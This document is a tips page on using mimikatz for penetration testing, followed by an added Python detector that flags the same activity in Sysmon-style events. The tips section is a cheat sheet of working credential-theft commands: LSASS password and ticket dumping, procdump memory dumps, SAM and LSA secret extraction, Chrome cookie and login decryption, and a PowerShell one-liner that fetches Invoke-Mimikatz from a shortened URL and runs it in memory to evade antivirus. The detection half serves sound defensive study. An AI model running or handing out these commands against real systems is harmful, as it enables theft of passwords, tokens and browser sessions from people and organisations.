[Tips] Using mimikatz in penetration testing

mimikatz is a tool I’ve made to learn C and make some experiments with Windows security.

It’s now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Write the mimikatz session log to a file (the log command with no argument writes everything that follows to mimikatz.log in the working directory; dir then shows the file)

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" exit && dir

Redirect the output to a file in the mimikatz directory and read the passwords from there

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt

Use PowerShell to bypass AV (Invoke-Mimikatz is downloaded and loaded in memory, so no mimikatz.exe touches disk)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Dump the LSASS process with procdump and parse the minidump offline in mimikatz

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp        (32-bit)
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp    (64-bit)

Then, in mimikatz, load the dump and read the logon sessions from it:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

Get the VPN password (stored credentials are dumped from the SAM and the LSA secrets)

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

Get the browser (Chrome) cookies and saved logins by decrypting them with DPAPI (USERDA~1 and LOGIND~1 are the 8.3 short names of "User Data" and "Login Data")

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit
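From the defender's side, every command above leaves a footprint in process-creation and process-access telemetry. As an added example (not part of the original tips), the detector below flags the mimikatz module prefixes, the procdump LSASS dump and the in-memory PowerShell loader in Sysmon-style events; the event records, the Image paths and the URL in them are constructed, and the field names assume Sysmon Event ID 1 (CommandLine) and Event ID 10 (TargetImage/GrantedAccess).

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process create) and
# Event ID 10 (process access). Values are made up; only the field names are Sysmon's.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\temp\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit'},
    {"EventID": 1, "Image": r"C:\temp\procdump.exe",
     "CommandLine": r"C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"IEX (New-Object Net.WebClient).DownloadString("
                    "'http://example.invalid/x'); Invoke-Mimikatz -DumpCreds\""},
    {"EventID": 10, "SourceImage": r"C:\temp\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

# Command-line rules derived from the tips on this page: mimikatz module syntax,
# procdump aimed at lsass, and the IEX/DownloadString loader for Invoke-Mimikatz.
CMDLINE_RULES = {
    "mimikatz_module": re.compile(r"\b(sekurlsa|lsadump|dpapi|privilege|token)::", re.I),
    "lsass_dump": re.compile(r"procdump.*\blsass(\.exe)?\b|-ma\s+lsass", re.I),
    "powershell_mimikatz_loader": re.compile(r"Invoke-Mimikatz|\bIEX\b.*DownloadString", re.I),
}

# Access-mask bits a credential dumper needs on lsass: PROCESS_VM_READ (0x10) and
# PROCESS_QUERY_INFORMATION (0x400). PROCESS_ALL_ACCESS (0x1FFFFF) includes both;
# 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) alone is benign and is ignored.
LSASS_READ_BITS = 0x0010 | 0x0400


def detect(events):
    """Return (EventID, rule name, offending image) tuples for matching events."""
    hits = []
    for ev in events:
        if ev["EventID"] == 1:
            for name, rx in CMDLINE_RULES.items():
                if rx.search(ev["CommandLine"]):
                    hits.append((1, name, ev["Image"]))
        elif ev["EventID"] == 10 and ev["TargetImage"].lower().endswith("\\lsass.exe"):
            if int(ev["GrantedAccess"], 16) & LSASS_READ_BITS:
                hits.append((10, "lsass_memory_access", ev["SourceImage"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

In production the same rules would run over Sysmon or Security 4688 events from a SIEM; the 0x1000 svchost access shows why the mask is filtered rather than alerting on every handle to lsass.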